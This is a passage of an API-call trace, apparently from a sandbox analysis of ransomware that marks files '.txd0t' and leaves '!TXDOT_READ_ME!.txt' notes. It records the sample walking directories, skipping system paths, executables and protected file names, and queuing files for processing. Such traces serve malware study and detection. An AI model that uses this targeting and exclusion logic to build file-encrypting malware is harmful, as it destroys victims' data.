(pszPath="$WINRE_BACKUP_PARTITION.MARKER") returned=".MARKER" [0085.272] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".MARKER") returned 0x0 [0085.272] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0085.272] StrCmpW (psz1="588bce7c90097ed212", psz2=".") returned 1 [0085.272] StrCmpW (psz1="588bce7c90097ed212", psz2="..") returned 1 [0085.272] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0085.272] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0085.272] StrNCatW (in: psz1="C:\\", psz2="588bce7c90097ed212", cchMax=1030 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\system32\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\system\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\local\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\boot\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\perflogs\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\programdata\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\drivers\\") returned 0x0 [0085.272] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\wsus\\") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="crypt_detect") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="cryptolocker") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="ransomware") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\WINDOWS") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\Program Files") returned 0x0 [0085.273] GetProcessHeap () returned 0xe30000 [0085.273] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xed3e88 [0085.273] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.273] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\*", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\*") returned="C:\\588bce7c90097ed212\\*" [0085.273] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2430 [0085.273] StrCmpW (psz1=".", psz2=".") returned 0 [0085.273] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.273] StrCmpW (psz1="..", psz2=".") returned 1 [0085.273] StrCmpW (psz1="..", psz2="..") returned 0 [0085.273] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1025", cAlternateFileName="")) returned 1 [0085.273] StrCmpW (psz1="1025", psz2=".") returned 1 [0085.273] StrCmpW (psz1="1025", psz2="..") returned 1 [0085.273] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.273] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.273] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1025", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\system32\\") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\system\\") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\local\\") returned 0x0 [0085.273] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\boot\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\perflogs\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\programdata\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\drivers\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\wsus\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="crypt_detect") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="cryptolocker") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="ransomware") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\WINDOWS") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\Program Files") returned 0x0 [0085.274] GetProcessHeap () returned 0xe30000 [0085.274] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.274] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0085.274] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\*") returned="C:\\588bce7c90097ed212\\1025\\*" [0085.274] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2070 [0085.274] StrCmpW (psz1=".", psz2=".") returned 0 [0085.274] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.275] StrCmpW (psz1="..", psz2=".") returned 1 [0085.275] StrCmpW (psz1="..", psz2="..") returned 0 [0085.275] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.275] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.275] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.275] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0085.275] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0085.275] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned="C:\\588bce7c90097ed212\\1025\\eula.rtf" [0085.275] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.275] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.275] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.275] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.275] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.275] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.275] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.275] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1025\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" [0085.275] SetEvent (hEvent=0x410) returned 1 [0085.277] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.277] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.277] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.278] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0085.278] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0085.278] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" [0085.278] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.278] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.278] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.278] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.278] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.278] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.279] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.279] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.279] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.279] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.279] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.279] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.280] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.280] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.280] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.280] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.280] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.280] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.280] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0085.280] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.280] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" [0085.280] SetEvent (hEvent=0x418) returned 1 [0085.296] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.296] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.296] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.296] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0085.296] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0085.296] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" [0085.296] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.296] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.296] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.296] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.296] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.296] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.296] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.296] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.296] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.296] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.297] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.297] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.297] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.297] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.297] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.297] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.297] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.297] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.297] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.297] FindClose (in: hFindFile=0xec2070 | out: hFindFile=0xec2070) returned 1 [0085.297] GetProcessHeap () returned 0xe30000 [0085.297] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.297] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1028", cAlternateFileName="")) returned 1 [0085.297] StrCmpW (psz1="1028", psz2=".") returned 1 [0085.297] StrCmpW (psz1="1028", psz2="..") returned 1 [0085.297] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.297] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.297] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1028", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\system32\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\system\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\local\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\boot\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\perflogs\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\programdata\\") returned 0x0 [0085.297] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\drivers\\") returned 0x0 [0085.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\wsus\\") returned 0x0 [0085.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="crypt_detect") returned 0x0 [0085.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="cryptolocker") returned 0x0 [0085.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="ransomware") returned 0x0 [0085.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\WINDOWS") returned 0x0 [0085.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.298] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\Program Files") returned 0x0 [0085.298] GetProcessHeap () returned 0xe30000 [0085.298] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.298] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0085.298] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\*") returned="C:\\588bce7c90097ed212\\1028\\*" [0085.298] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0085.298] StrCmpW 